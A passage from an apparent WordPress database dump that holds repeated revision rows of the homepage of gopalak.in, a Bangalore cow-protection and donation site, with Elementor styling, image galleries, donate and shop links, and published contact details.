title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:40:29','2022-10-20 12:10:29','',1373,'https://gopalak.in/?p=1945',0,'revision','',0),(1946,1,'2022-10-20 17:40:29','2022-10-20 12:10:29','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h4>Address</h4>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:40:29','2022-10-20 12:10:29','',1373,'https://gopalak.in/?p=1946',0,'revision','',0),(1947,1,'2022-10-20 17:40:29','2022-10-20 12:10:29','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-20 17:40:29','2022-10-20 12:10:29','',1373,'https://gopalak.in/?p=1947',0,'revision','',0),(1948,1,'2022-10-20 17:41:39','2022-10-20 12:11:39','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a 